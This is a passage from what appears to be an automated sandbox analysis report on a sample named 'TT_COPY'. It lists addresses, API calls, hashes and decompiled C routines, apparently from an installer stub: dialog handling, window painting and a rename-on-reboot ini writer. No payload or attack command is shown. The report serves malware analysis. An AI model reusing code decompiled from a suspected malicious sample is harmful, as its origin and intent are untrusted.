                                                                                                                            0x00404fc4
                                                                                                                            0x00404fc9
                                                                                                                            0x00404fdf
                                                                                                                            0x00404ff0
                                                                                                                            0x00404ffd
                                                                                                                            0x00404ffd
                                                                                                                            0x00405000
                                                                                                                            0x00405006
                                                                                                                            0x00405008
                                                                                                                            0x0040500b
                                                                                                                            0x00405010
                                                                                                                            0x00405015
                                                                                                                            0x00405017
                                                                                                                            0x00405017
                                                                                                                            0x00405037
                                                                                                                            0x00405037
                                                                                                                            0x00405039
                                                                                                                            0x0040503a
                                                                                                                            0x0040503f
                                                                                                                            0x00405045
                                                                                                                            0x00405049
                                                                                                                            0x0040504e
                                                                                                                            0x00405056
                                                                                                                            0x0040505a
                                                                                                                            0x0040505f
                                                                                                                            0x00405064
                                                                                                                            0x0040506c
                                                                                                                            0x0040506f
                                                                                                                            0x0040513f
                                                                                                                            0x00405152
                                                                                                                            0x00000000
                                                                                                                            0x00405075
                                                                                                                            0x00405078
                                                                                                                            0x0040507b
                                                                                                                            0x0040507e
                                                                                                                            0x0040507e
                                                                                                                            0x00405084
                                                                                                                            0x0040508d
                                                                                                                            0x00405090
                                                                                                                            0x00405094
                                                                                                                            0x00405097
                                                                                                                            0x0040509a
                                                                                                                            0x004050a3
                                                                                                                            0x004050ac
                                                                                                                            0x004050af
                                                                                                                            0x004050b2
                                                                                                                            0x004050b5
                                                                                                                            0x004050f3
                                                                                                                            0x0040511e
                                                                                                                            0x004050f5
                                                                                                                            0x00405104
                                                                                                                            0x00405104
                                                                                                                            0x004050b7
                                                                                                                            0x004050ba
                                                                                                                            0x004050c8
                                                                                                                            0x004050d2
                                                                                                                            0x004050da
                                                                                                                            0x004050e1
                                                                                                                            0x004050ec
                                                                                                                            0x004050ec
                                                                                                                            0x004050b5
                                                                                                                            0x00405124
                                                                                                                            0x00405125
                                                                                                                            0x00405131
                                                                                                                            0x00405131
                                                                                                                            0x0040513d
                                                                                                                            0x00405158
                                                                                                                            0x0040515b
                                                                                                                            0x00405178
                                                                                                                            0x00000000
                                                                                                                            0x0040515d
                                                                                                                            0x00405162
                                                                                                                            0x0040516b
                                                                                                                            0x004054fe
                                                                                                                            0x00405510
                                                                                                                            0x00405510
                                                                                                                            0x0040515b
                                                                                                                            0x00000000
                                                                                                                            0x0040513d
                                                                                                                            0x0040506f

                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                            • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                            • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                            • String ID: $M$N
                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                            • Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                                                                                                                            • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                            • Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                                                                                                                            • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                                                            				intOrPtr _v8;
                                                                                                                            				int _v12;
                                                                                                                            				void* _v16;
                                                                                                                            				struct HWND__* _t56;
                                                                                                                            				signed int _t75;
                                                                                                                            				signed short* _t76;
                                                                                                                            				signed short* _t78;
                                                                                                                            				long _t92;
                                                                                                                            				int _t103;
                                                                                                                            				signed int _t110;
                                                                                                                            				intOrPtr _t113;
                                                                                                                            				WCHAR* _t114;
                                                                                                                            				signed int* _t116;
                                                                                                                            				WCHAR* _t117;
                                                                                                                            				struct HWND__* _t118;
                                                                                                                            
                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                            					if(_a8 != 0x111) {
                                                                                                                            						L13:
                                                                                                                            						if(_a8 != 0x4e) {
                                                                                                                            							if(_a8 == 0x40b) {
                                                                                                                            								 *0x42b234 =  *0x42b234 + 1;
                                                                                                                            							}
                                                                                                                            							L27:
                                                                                                                            							_t114 = _a16;
                                                                                                                            							L28:
                                                                                                                            							return E00404500(_a8, _a12, _t114);
                                                                                                                            						}
                                                                                                                            						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                                                            						_t114 = _a16;
                                                                                                                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                                                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                                                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                                                            							_v12 = _t103;
                                                                                                                            							_v16 = _t113;
                                                                                                                            							_v8 = 0x432ea0;
                                                                                                                            							if(_t103 - _t113 < 0x800) {
                                                                                                                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                                                            								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                                                            								_push(1);
                                                                                                                            								E00404907(_a4, _v8);
                                                                                                                            								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                                                            								_t114 = _a16;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                                                            							goto L28;
                                                                                                                            						} else {
                                                                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                                                            								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                                                                                            							}
                                                                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                                                            								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                                                                                            							}
                                                                                                                            							return 1;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                                                                                            						goto L27;
                                                                                                                            					} else {
                                                                                                                            						_t116 =  *0x42c240 + 0x14;
                                                                                                                            						if(( *_t116 & 0x00000020) == 0) {
                                                                                                                            							goto L27;
                                                                                                                            						}
                                                                                                                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                            						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                            						E004048E3();
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				_t117 = _a16;
                                                                                                                            				_t75 =  *(_t117 + 0x30);
                                                                                                                            				if(_t75 < 0) {
                                                                                                                            					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                                                                                            				}
                                                                                                                            				_t76 =  *0x434f38 + _t75 * 2;
                                                                                                                            				_t110 =  *_t76 & 0x0000ffff;
                                                                                                                            				_a8 = _t110;
                                                                                                                            				_t78 =  &(_t76[1]);
                                                                                                                            				_a16 = _t78;
                                                                                                                            				_v16 = _t78;
                                                                                                                            				_v12 = 0;
                                                                                                                            				_v8 = E00404609;
                                                                                                                            				if(_t110 != 2) {
                                                                                                                            					_v8 = E004045CF;
                                                                                                                            				}
                                                                                                                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                                                            				_push(0x22);
                                                                                                                            				E00404499(_a4);
                                                                                                                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                                                            				_push(0x23);
                                                                                                                            				E00404499(_a4);
                                                                                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                            				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                                                            				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                                                            				E004044CE(_t118);
                                                                                                                            				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                                                            				_t92 =  *( *0x434f10 + 0x68);
                                                                                                                            				if(_t92 < 0) {
                                                                                                                            					_t92 = GetSysColor( ~_t92);
                                                                                                                            				}
                                                                                                                            				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                                                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                                                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                                                            				 *0x42b234 = 0;
                                                                                                                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                                                            				 *0x42b234 = 0;
                                                                                                                            				return 0;
                                                                                                                            			}


















                                                                                                                            0x0040466a
                                                                                                                            0x00404797
                                                                                                                            0x004047f4
                                                                                                                            0x004047f8
                                                                                                                            0x004048c5
                                                                                                                            0x004048c7
                                                                                                                            0x004048c7
                                                                                                                            0x004048cd
                                                                                                                            0x004048cd
                                                                                                                            0x004048d0
                                                                                                                            0x00000000
                                                                                                                            0x004048d7
                                                                                                                            0x00404806
                                                                                                                            0x0040480c
                                                                                                                            0x00404816
                                                                                                                            0x00404821
                                                                                                                            0x00404824
                                                                                                                            0x00404827
                                                                                                                            0x00404832
                                                                                                                            0x00404835
                                                                                                                            0x0040483c
                                                                                                                            0x00404849
                                                                                                                            0x0040485a
                                                                                                                            0x00404860
                                                                                                                            0x00404868
                                                                                                                            0x00404876
                                                                                                                            0x0040487c
                                                                                                                            0x0040487c
                                                                                                                            0x0040483c
                                                                                                                            0x00404886
                                                                                                                            0x00000000
                                                                                                                            0x00404891
                                                                                                                            0x00404895
                                                                                                                            0x004048a5
                                                                                                                            0x004048a5
                                                                                                                            0x004048ab
                                                                                                                            0x004048b7
                                                                                                                            0x004048b7
                                                                                                                            0x00000000
                                                                                                                            0x004048bb
                                                                                                                            0x00404886
                                                                                                                            0x004047a2
                                                                                                                            0x00000000
                                                                                                                            0x004047b4
                                                                                                                            0x004047b9
                                                                                                                            0x004047bf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004047e8
                                                                                                                            0x004047ea
                                                                                                                            0x004047ef
                                                                                                                            0x00000000
                                                                                                                            0x004047ef
                                                                                                                            0x004047a2
                                                                                                                            0x00404670
                                                                                                                            0x00404673
                                                                                                                            0x00404678
                                                                                                                            0x00404689
                                                                                                                            0x00404689
                                                                                                                            0x00404691
                                                                                                                            0x00404694
                                                                                                                            0x00404698
                                                                                                                            0x0040469b
                                                                                                                            0x0040469f
                                                                                                                            0x004046a2
                                                                                                                            0x004046a5
                                                                                                                            0x004046a8
                                                                                                                            0x004046af
                                                                                                                            0x004046b1
                                                                                                                            0x004046b1
                                                                                                                            0x004046bb
                                                                                                                            0x004046c8
                                                                                                                            0x004046d2
                                                                                                                            0x004046d7
                                                                                                                            0x004046da
                                                                                                                            0x004046df
                                                                                                                            0x004046f6
                                                                                                                            0x004046fd
                                                                                                                            0x00404710
                                                                                                                            0x00404713
                                                                                                                            0x00404727
                                                                                                                            0x0040472e
                                                                                                                            0x00404733
                                                                                                                            0x00404738
                                                                                                                            0x00404738
                                                                                                                            0x00404746
                                                                                                                            0x00404754
                                                                                                                            0x00404766
                                                                                                                            0x0040476b
                                                                                                                            0x0040477b
                                                                                                                            0x0040477d
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                            • GetSysColor.USER32(?), ref: 00404738
                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                            • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                            • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                            • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                            • String ID: Call$N
                                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                                            • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                            • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                            • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                            • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                            				struct tagLOGBRUSH _v16;
                                                                                                                            				struct tagRECT _v32;
                                                                                                                            				struct tagPAINTSTRUCT _v96;
                                                                                                                            				struct HDC__* _t70;
                                                                                                                            				struct HBRUSH__* _t87;
                                                                                                                            				struct HFONT__* _t94;
                                                                                                                            				long _t102;
                                                                                                                            				signed int _t126;
                                                                                                                            				struct HDC__* _t128;
                                                                                                                            				intOrPtr _t130;
                                                                                                                            
                                                                                                                            				if(_a8 == 0xf) {
                                                                                                                            					_t130 =  *0x434f10;
                                                                                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                            					_a8 = _t70;
                                                                                                                            					GetClientRect(_a4,  &_v32);
                                                                                                                            					_t126 = _v32.bottom;
                                                                                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                            					while(_v32.top < _t126) {
                                                                                                                            						_a12 = _t126 - _v32.top;
                                                                                                                            						asm("cdq");
                                                                                                                            						asm("cdq");
                                                                                                                            						asm("cdq");
                                                                                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                            						_v32.bottom = _v32.bottom + 4;
                                                                                                                            						_a16 = _t87;
                                                                                                                            						FillRect(_a8,  &_v32, _t87);
                                                                                                                            						DeleteObject(_a16);
                                                                                                                            						_v32.top = _v32.top + 4;
                                                                                                                            					}
                                                                                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                                                            						_a16 = _t94;
                                                                                                                            						if(_t94 != 0) {
                                                                                                                            							_t128 = _a8;
                                                                                                                            							_v32.left = 0x10;
                                                                                                                            							_v32.top = 8;
                                                                                                                            							SetBkMode(_t128, 1);
                                                                                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                            							_a8 = SelectObject(_t128, _a16);
                                                                                                                            							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                                                                                            							SelectObject(_t128, _a8);
                                                                                                                            							DeleteObject(_a16);
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					EndPaint(_a4,  &_v96);
                                                                                                                            					return 0;
                                                                                                                            				}
                                                                                                                            				_t102 = _a16;
                                                                                                                            				if(_a8 == 0x46) {
                                                                                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                                                                                            				}
                                                                                                                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                                                            			}













                                                                                                                            0x0040100a
                                                                                                                            0x00401039
                                                                                                                            0x00401047
                                                                                                                            0x0040104d
                                                                                                                            0x00401051
                                                                                                                            0x0040105b
                                                                                                                            0x00401061
                                                                                                                            0x00401064
                                                                                                                            0x004010f3
                                                                                                                            0x00401089
                                                                                                                            0x0040108c
                                                                                                                            0x004010a6
                                                                                                                            0x004010bd
                                                                                                                            0x004010cc
                                                                                                                            0x004010cf
                                                                                                                            0x004010d5
                                                                                                                            0x004010d9
                                                                                                                            0x004010e4
                                                                                                                            0x004010ed
                                                                                                                            0x004010ef
                                                                                                                            0x004010ef
                                                                                                                            0x00401100
                                                                                                                            0x00401105
                                                                                                                            0x0040110d
                                                                                                                            0x00401110
                                                                                                                            0x00401112
                                                                                                                            0x00401118
                                                                                                                            0x0040111f
                                                                                                                            0x00401126
                                                                                                                            0x00401130
                                                                                                                            0x00401142
                                                                                                                            0x00401156
                                                                                                                            0x00401160
                                                                                                                            0x00401165
                                                                                                                            0x00401165
                                                                                                                            0x00401110
                                                                                                                            0x0040116e
                                                                                                                            0x00000000
                                                                                                                            0x00401178
                                                                                                                            0x00401010
                                                                                                                            0x00401013
                                                                                                                            0x00401015
                                                                                                                            0x0040101f
                                                                                                                            0x0040101f
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                            • String ID: F
                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                            • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                            • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                            • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                            • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00406183(void* __ecx) {
                                                                                                                            				void* __ebx;
                                                                                                                            				void* __edi;
                                                                                                                            				void* __esi;
                                                                                                                            				long _t12;
                                                                                                                            				long _t24;
                                                                                                                            				char* _t31;
                                                                                                                            				int _t37;
                                                                                                                            				void* _t38;
                                                                                                                            				intOrPtr* _t39;
                                                                                                                            				long _t42;
                                                                                                                            				WCHAR* _t44;
                                                                                                                            				void* _t46;
                                                                                                                            				void* _t48;
                                                                                                                            				void* _t49;
                                                                                                                            				void* _t52;
                                                                                                                            				void* _t53;
                                                                                                                            
                                                                                                                            				_t38 = __ecx;
                                                                                                                            				_t44 =  *(_t52 + 0x14);
                                                                                                                            				 *0x430908 = 0x55004e;
                                                                                                                            				 *0x43090c = 0x4c;
                                                                                                                            				if(_t44 == 0) {
                                                                                                                            					L3:
                                                                                                                            					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                            						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                                                                                            						_t53 = _t52 + 0x10;
                                                                                                                            						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                                                                                            						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                                                                                            						_t48 = _t12;
                                                                                                                            						 *(_t53 + 0x18) = _t48;
                                                                                                                            						if(_t48 != 0xffffffff) {
                                                                                                                            							_t42 = GetFileSize(_t48, 0);
                                                                                                                            							_t6 = _t37 + 0xa; // 0xa
                                                                                                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                            							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                                                                                            								L18:
                                                                                                                            								return CloseHandle(_t48);
                                                                                                                            							} else {
                                                                                                                            								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                            									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                                                                                            									if(_t49 == 0) {
                                                                                                                            										_t48 =  *(_t53 + 0x18);
                                                                                                                            										L16:
                                                                                                                            										_t24 = _t42;
                                                                                                                            										L17:
                                                                                                                            										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                                                                                            										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                            										E004060DF(_t48, _t46, _t42 + _t37);
                                                                                                                            										GlobalFree(_t46);
                                                                                                                            										goto L18;
                                                                                                                            									}
                                                                                                                            									_t39 = _t46 + _t42;
                                                                                                                            									_t31 = _t39 + _t37;
                                                                                                                            									while(_t39 > _t49) {
                                                                                                                            										 *_t31 =  *_t39;
